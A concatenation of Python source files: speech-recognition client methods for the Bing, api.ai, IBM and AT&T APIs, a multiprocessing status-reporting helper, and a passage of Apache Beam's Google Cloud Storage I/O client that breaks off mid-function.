credential_request = Request(credential_url, data = urlencode({
"grant_type": "client_credentials",
"client_id": "python",
"client_secret": key,
"scope": "https://speech.platform.bing.com"
}).encode("utf-8"))
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
credential_text = credential_response.read().decode("utf-8")
credentials = json.loads(credential_text)
access_token, expiry_seconds = credentials["access_token"], float(credentials["expires_in"])
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + expiry_seconds
wav_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be 8kHz or 16 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{0}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data = wav_data, headers = {
"Authorization": "Bearer {0}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={0}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_api(self, audio_data, client_access_token, language = "en", session_id = None, show_all = False):
"""
Perform speech recognition on ``audio_data`` (an ``AudioData`` instance), using the api.ai Speech to Text API.
The api.ai API client access token is specified by ``client_access_token``. Unfortunately, this is not available without `signing up for an account <https://console.api.ai/api-client/#/signup>`__ and creating an api.ai agent. To get the API client access token, go to the agent settings, go to the section titled "API keys", and look for "Client access token". API client access tokens are 32-character lowercase hexadecimal strings.
Although the recognition language is specified when creating the api.ai agent in the web console, it must also be provided in the ``language`` parameter as an RFC5646 language tag like ``"en"`` (US English) or ``"fr"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://api.ai/docs/reference/#languages>`__.
The ``session_id`` is an optional string of up to 36 characters used to identify the client making the requests; api.ai can make use of previous requests that used the same session ID to give more accurate results for future requests. If ``None``, sessions are not used; every query is interpreted as if it is the first one.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://api.ai/docs/reference/#a-namepost-multipost-query-multipart>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(client_access_token, str), "`username` must be a string"
assert isinstance(language, str), "`language` must be a string"
assert session_id is None or (isinstance(session_id, str) and len(session_id) <= 36), "`session_id` must be a string of up to 36 characters"
wav_data = audio_data.get_wav_data(convert_rate = 16000, convert_width = 2) # audio must be 16-bit mono 16 kHz
url = "https://api.api.ai/v1/query"
# pick a good multipart boundary; one that is guaranteed not to be in the text
while True:
boundary = uuid.uuid4().hex # generate a random boundary
if boundary.encode("utf-8") not in wav_data:
break
if session_id is None: session_id = uuid.uuid4().hex
data = (
b"--" + boundary.encode("utf-8") + b"\r\n" +
b"Content-Disposition: form-data; name=\"request\"\r\n" +
b"Content-Type: application/json\r\n" +
b"\r\n" +
b"{\"v\": \"20150910\", \"sessionId\": \"" + session_id.encode("utf-8") + b"\", \"lang\": \"" + language.encode("utf-8") + b"\"}\r\n" +
b"--" + boundary.encode("utf-8") + b"\r\n" +
b"Content-Disposition: form-data; name=\"voiceData\"; filename=\"audio.wav\"\r\n" +
b"Content-Type: audio/wav\r\n" +
b"\r\n" +
wav_data + b"\r\n" +
b"--" + boundary.encode("utf-8") + b"--\r\n"
)
request = Request(url, data = data, headers = {
"Authorization": "Bearer {0}".format(client_access_token),
"Content-Length": str(len(data)),
"Expect": "100-continue",
"Content-Type": "multipart/form-data; boundary={0}".format(boundary)
})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "asr" not in result or result["asr"] is None:
raise UnknownValueError()
return result["result"]["resolvedQuery"]
def recognize_ibm(self, audio_data, username, password, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the IBM Speech to Text API.
The IBM Speech to Text username and password are specified by ``username`` and ``password``, respectively. Unfortunately, these are not available without `signing up for an account <https://console.ng.bluemix.net/registration/>`__. Once logged into the Bluemix console, follow the instructions for `creating an IBM Watson service instance <http://www.ibm.com/smarterplanet/us/en/ibmwatson/developercloud/doc/getting_started/gs-credentials.shtml>`__, where the Watson service is "Speech To Text". IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX, while passwords are mixed-case alphanumeric strings.
The recognition language is determined by ``language``, an RFC5646 language tag with a dialect like ``"en-US"`` (US English) or ``"zh-CN"`` (Mandarin Chinese), defaulting to US English. The supported language values are listed under the ``model`` parameter of the `audio recognition API documentation <http://www.ibm.com/smarterplanet/us/en/ibmwatson/developercloud/speech-to-text/api/v1/#recognize_audio_sessionless12>`__, in the form ``LANGUAGE_BroadbandModel``, where ``LANGUAGE`` is the language value.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <http://www.ibm.com/smarterplanet/us/en/ibmwatson/developercloud/speech-to-text/api/v1/#recognize_audio_sessionless12>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(username, str), "`username` must be a string"
assert isinstance(password, str), "`password` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate = None if audio_data.sample_rate >= 16000 else 16000, # audio samples should be at least 16 kHz
convert_width = None if audio_data.sample_width >= 2 else 2 # audio samples should be at least 16-bit
)
model = "{0}_BroadbandModel".format(language)
url = "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize?{0}".format(urlencode({
"profanity_filter": "false",
"continuous": "true",
"model": model,
}))
request = Request(url, data = flac_data, headers = {"Content-Type": "audio/x-flac"})
if hasattr("", "encode"):
authorization_value = base64.standard_b64encode("{0}:{1}".format(username, password).encode("utf-8")).decode("utf-8")
else:
authorization_value = base64.standard_b64encode("{0}:{1}".format(username, password))
request.add_header("Authorization", "Basic {0}".format(authorization_value))
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "results" not in result or len(result["results"]) < 1 or "alternatives" not in result["results"][0]:
raise UnknownValueError()
transcription = []
for utterance in result["results"]:
if "alternatives" not in utterance: raise UnknownValueError()
for hypothesis in utterance["alternatives"]:
if "transcript" in hypothesis:
transcription.append(hypothesis["transcript"])
return "\n".join(transcription)
def get_flac_converter():
# determine which converter executable to use
system = platform.system()
path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
compatible_machine_types = ["i686", "i786", "x86", "x86_64", "AMD64"] # whitelist of machine types our bundled binaries are compatible with
if system == "Windows" and platform.machine() in compatible_machine_types:
flac_converter = os.path.join(path, "flac-win32.exe")
elif system == "Linux" and platform.machine() in compatible_machine_types:
flac_converter = os.path.join(path, "flac-linux-x86")
elif system == "Darwin" and platform.machine() in compatible_machine_types:
flac_converter = os.path.join(path, "flac-mac")
else:
raise OSError("FLAC conversion utility not available - consider installing the FLAC command line application using `brew install flac` or your operating system's equivalent")
# mark FLAC converter as executable if possible
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
return flac_converter
def shutil_which(pgm):
"""Python 2 backport of ``shutil.which()`` from Python 3"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
if os.path.exists(p) and os.access(p, os.X_OK):
return p
# backwards compatibility shims
WavFile = AudioFile # WavFile was renamed to AudioFile in 3.4.1
def recognize_att(self, audio_data, app_key, app_secret, language = "en-US", show_all = False):
authorization_url = "https://api.att.com/oauth/v4/token"
authorization_body = "client_id={0}&client_secret={1}&grant_type=client_credentials&scope=SPEECH".format(app_key, app_secret)
try: authorization_response = urlopen(authorization_url, data = authorization_body.encode("utf-8"))
except HTTPError as e: raise RequestError("credential request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code))))
except URLError as e: raise RequestError("credential connection failed: {0}".format(e.reason))
authorization_text = authorization_response.read().decode("utf-8")
authorization_bearer = json.loads(authorization_text).get("access_token")
if authorization_bearer is None: raise RequestError("missing OAuth access token in requested credentials")
wav_data = audio_data.get_wav_data(convert_rate = 8000 if audio_data.sample_rate < 16000 else 16000, convert_width = 2)
request = Request("https://api.att.com/speech/v3/speechToText", data = wav_data, headers = {"Authorization": "Bearer {0}".format(authorization_bearer), "Content-Language": language, "Content-Type": "audio/wav"})
try: response = urlopen(request)
except HTTPError as e: raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code))))
except URLError as e: raise RequestError("recognition connection failed: {0}".format(e.reason))
result = json.loads(response.read().decode("utf-8"))
if show_all: return result
if "Recognition" not in result or "NBest" not in result["Recognition"]: raise UnknownValueError()
for entry in result["Recognition"]["NBest"]:
if entry.get("Grade") == "accept" and "ResultText" in entry: return entry["ResultText"]
raise UnknownValueError() # no transcriptions available
Recognizer.recognize_att = classmethod(recognize_att) # AT&T API is deprecated and shutting down as of 3.4.0
|
multiprocessing.py
|
#
# Copyright 2021 Johannes Hörmann
#
# ### MIT license
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""Multiprocessing utils."""
# NOTE: depending on platform, we may have to experiment with the forking methods,
# https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods
import asyncio
import logging
import multiprocessing # run task as child process to avoid side effects
import queue
import traceback # forward exception from child process to parent process
logger = logging.getLogger(__name__)
# inspired by
# https://stackoverflow.com/questions/19924104/python-multiprocessing-handling-child-errors-in-parent
class Process(multiprocessing.Process):
"""
Class which returns child Exceptions to Parent.
https://stackoverflow.com/a/33599967/4992248
"""
def __init__(self, *args, **kwargs):
multiprocessing.Process.__init__(self, *args, **kwargs)
self._parent_conn, self._child_conn = multiprocessing.Pipe()
self._exception = None
def run(self):
try:
super().run()
self._child_conn.send(None)
except Exception as e:
tb = traceback.format_exc()
self._child_conn.send((e, tb))
raise e # You can still rise this exception if you need to
@property
def exception(self):
if self._parent_conn.poll():
self._exception = self._parent_conn.recv()
return self._exception
class StatusReportingChildProcessBuilder:
"""Outsource serial functions with status report handlers.
The status report handler is expected to conform to the
click.ProgressBar interface. In particular, it must exhibit an
update(val) method.
For any function that runs serial and reports status via such a callback,
this wrapper can run them in a non-blocking forked process and forward the
status reports via queue to the callback.
The function must have the signature
func(*args, status_report_callback=None)
"""
def __init__(self, target, status_report_callback):
self._target = target
self._status_report_handler = status_report_callback
async def __call__(self, *args):
"""Spawn child process to assure my environment stays untouched."""
return_value_queue = multiprocessing.Queue()
status_progress_queue = multiprocessing.Queue()
process = Process(target=self.target_wrapper, args=[return_value_queue, status_progress_queue, *args])
process.start()
# wait for child to queue its return value and
# check whether child raises exception
while return_value_queue.empty():
# if child raises exception, then it has terminated
# before queueing any return value
if process.exception:
error, p_traceback = process.exception
raise ChildProcessError(p_traceback)
try:
status_report = status_progress_queue.get_nowait()
except queue.Empty:
pass
else:
logger.debug(f"Parent process received status report {status_report}")
self._status_report_handler.update(status_report)
await asyncio.sleep(0.1)
return_value = return_value_queue.get()
# for any child that never raises an exception and does not queue
# anything to the return_value_queue, will deadlock here
process.join()
return return_value
def target_wrapper(self, return_value_queue, status_progress_queue, *args):
class StatusReportClass:
def update(status_report):
logger.debug(f"Child process queues status report {status_report}")
status_progress_queue.put(status_report)
return_value_queue.put(self._target(*args, status_report_callback=StatusReportClass))
def test_function(steps, status_report_callback):
for n in range(steps):
print(f"Child process step {n}")
status_report_callback.update(n)
return True
class test_handler:
def update(n):
print(f"Test callback received report for step {n}")
async def test_run():
test_process = StatusReportingChildProcessBuilder(test_function, test_handler)
return_value = await test_process(10)
print(f"Child process returned {return_value}.")
|
gcsio.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
import cStringIO
import errno
import fnmatch
import logging
import multiprocessing
import os
import Queue
import re
import threading
import time
import traceback
import httplib2
from apache_beam.utils import retry
__all__ = ['GcsIO']
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
# This is the number of seconds the library will wait for GCS operations to
# complete.
DEFAULT_HTTP_TIMEOUT_SECONDS = 60
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
def parse_gcs_path(gcs_path):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.+)$', gcs_path)
if match is None:
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __new__(cls, storage_client=None):
if storage_client:
# This path is only used for testing.
return super(GcsIO, cls).__new__(cls)
else:
# Create a single storage client for each thread. We would like to avoid
# creating more than one storage client for each thread, since each
# initialization requires the relatively expensive step of initializing
# credentaials.
local_state = threading.local()
if getattr(local_state, 'gcsio_instance', None) is None:
credentials = auth.get_service_credentials()
storage_client = storage.StorageV1(
credentials=credentials,
http=httplib2.Http(timeout=DEFAULT_HTTP_TIMEOUT_SECONDS))
local_state.gcsio_instance = (
super(GcsIO, cls).__new__(cls, storage_client))
local_state.gcsio_instance.client = storage_client
return local_state.gcsio_instance
def __init__(self, storage_client=None):
# We must do this check on storage_client because the client attribute may
# have already been set in __new__ for the singleton case when
# storage_client is None.
if storage_client is not None:
self.client = storage_client
def open(self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
~exceptions.ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
return GcsBufferedReader(self.client, filename, mode=mode,
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
return GcsBufferedWriter(self.client, filename, mode=mode,
mime_type=mime_type)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def glob(self, pattern, limit=None):
"""Return the GCS path names matching a given path name pattern.
Path name patterns are those recognized by fnmatch.fnmatch(). The path
can contain glob characters (*, ?, and [...] sets).
Args:
pattern: GCS file path pattern in the form gs://<bucket>/<name_pattern>.
limit: Maximal number of path names to return.
All matching paths are returned if set to None.
Returns:
list of GCS file paths matching the given pattern.
"""
bucket, name_pattern = parse_gcs_path(pattern)
# Get the prefix with which we can list objects in the given bucket.
prefix = re.match('^[^[*?]*', name_pattern).group(0)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
object_paths = []
while True:
response = self.client.objects.List(request)
for item in response.items:
if fnmatch.fnmatch(item.name, name_pattern):
object_paths.append('gs://%s/%s' % (item.bucket, item.name))
if response.nextPageToken:
request.pageToken = response.nextPageToken
if limit is not None and len(object_paths) >= limit:
break
else:
break
return object_paths[:limit]
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES)
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(self, src, dest):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsCopyRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path)
try:
self.client.objects.Copy(request)
except HttpError as http_error:
if http_error.status_code == 404:
# This is a permanent error that should not be retried. Note that
# FileBasedSink.finalize_write expects an IOError when the source
# file does not exist.
raise GcsIOError(errno.ENOENT, 'Source file not found: %s' % src)
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(self, src_dest_pairs):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
batch_request = BatchApiRequest(
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES)
for src, dest in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsCopyRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path)
batch_request.Add(self.client.objects, 'Copy', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
src, dest = src_dest_pairs[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
result_statuses.append((src, dest, exception))
return result_statuses
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.glob(src + '*'):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size_of_files_in_glob(self, pattern, limit=None):
"""Returns the size of all the files in the glob as a dictionary
Args:
pattern: a file path pattern that reads the size of all the files
"""
bucket, name_pattern = parse_gcs_path(pattern)
# Get the prefix with which we can list objects in the given bucket.
prefix = re.match('^[^[*?]*', name_pattern).group(0)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
logging.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
if fnmatch.fnmatch(item.name, name_pattern):
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if limit is not None and counter >= limit:
break
if counter % 10000 == 0:
logging.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
if limit is not None and len(file_sizes) >= limit:
break
else:
break
logging.info(
"Finished the size estimation of the input at %s files. " +\
"Estimation took %s seconds", counter, time.time() - start_time)
return file_sizes
# TODO: Consider using cStringIO instead of buffers and data_lists when reading.
class GcsBufferedReader(object):
"""A class for reading Google Cloud Storage files."""
def __init__(self,
client,
path,
mode='r',
buffer_size=DEFAULT_READ_BUFFER_SIZE,
segment_timeout=DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS):
self.client = client
self.path = path
self.bucket, self.name = parse_gcs_path(path)
self.mode = mode
self.buffer_size = buffer_size
self.segment_timeout = segment_timeout
# Get object state.
self.get_request = (storage.StorageObjectsGetRequest(
bucket=self.bucket, object=self.name))
try:
metadata = self._get_object_metadata(self.get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self.path)
else:
logging.error('HTTP error while requesting file %s: %s', self.path,
http_error)
raise
self.size = metadata.size
# Ensure read is from file of the correct generation.
self.get_request.generation = metadata.generation
# Initialize read buffer state.
self.download_stream = cStringIO.StringIO()
self.downloader = transfer.Download(
self.download_stream, auto_transfer=False, chunksize=self.buffer_size)
self.client.objects.Get(self.get_request, download=self.downloader)
self.position = 0
self.buffer = ''
self.buffer_start_position = 0
self.closed = False
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self.client.objects.Get(get_request)
def __iter__(self):
return self
def __next__(self):
"""Read one line delimited by '\\n' from the file.
"""
return next(self)
def next(self):
"""Read one line delimited by '\\n' from the file.
"""
line = self.readline()
if not line:
raise StopIteration
return line
def read(self, size=-1):
"""Read data from a GCS file.
Args:
size: Number of bytes to read. Actual number of bytes read is always
equal to size unless EOF is reached. If size is negative or
unspecified, read the entire file.
Returns:
data read as str.
Raises:
IOError: When this buffer is closed.
"""
return self._read_inner(size=size, readline=False)
def readline(self, size=-1):
"""Read one line delimited by '\\n' from the file.
Mimics behavior of the readline() method on standard file objects.
A trailing newline character is kept in the string. It may be absent when a
file ends with an incomplete line. If the size argument is non-negative,
it specifies the maximum string size (counting the newline) to return.
A negative size is the same as unspecified. Empty string is returned
only when EOF is encountered immediately.
Args:
size: Maximum number of bytes to read. If not specified, readline stops
only on '\\n' or EOF.
Returns:
The data read as a string.
Raises:
IOError: When this buffer is closed.
"""
return self._read_inner(size=size, readline=True)
def _read_inner(self, size=-1, readline=False):
"""Shared implementation of read() and readline()."""
self._check_open()
if not self._remaining():
return ''
# Prepare to read.
data_list = []
if size is None:
size = -1
to_read = min(size, self._remaining())
if to_read < 0:
to_read = self._remaining()
break_after = False
while to_read > 0:
# If we have exhausted the buffer, get the next segment.
# TODO(ccy): We should consider prefetching the next block in another
# thread.
self._fetch_next_if_buffer_exhausted()
# Determine number of bytes to read from buffer.
buffer_bytes_read = self.position - self.buffer_start_position
bytes_to_read_from_buffer = min(
len(self.buffer) - buffer_bytes_read, to_read)
# If readline is set, we only want to read up to and including the next
# newline character.
if readline:
next_newline_position = self.buffer.find('\n', buffer_bytes_read,
len(self.buffer))
if next_newline_position != -1:
bytes_to_read_from_buffer = (
1 + next_newline_position - buffer_bytes_read)
break_after = True
# Read bytes.
data_list.append(self.buffer[buffer_bytes_read:buffer_bytes_read +
bytes_to_read_from_buffer])
self.position += bytes_to_read_from_buffer
to_read -= bytes_to_read_from_buffer
if break_after:
break
return ''.join(data_list)
def _fetch_next_if_buffer_exhausted(self):
if not self.buffer or (
self.buffer_start_position + len(self.buffer) <= self.position):
bytes_to_request = min(self._remaining(), self.buffer_size)
self.buffer_start_position = self.position
retry_count = 0
while retry_count <= 10:
queue = Queue.Queue()
t = threading.Thread(target=self._fetch_to_queue,
args=(queue, self._get_segment,
(self.position, bytes_to_request)))
t.daemon = True
t.start()
try:
result, exn, tb = queue.get(timeout=self.segment_timeout)
except Queue.Empty:
logging.warning(
('Timed out fetching %d bytes from position %d of %s after %f '
'seconds; retrying...'), bytes_to_request, self.position,
self.path, self.segment_timeout)
retry_count += 1
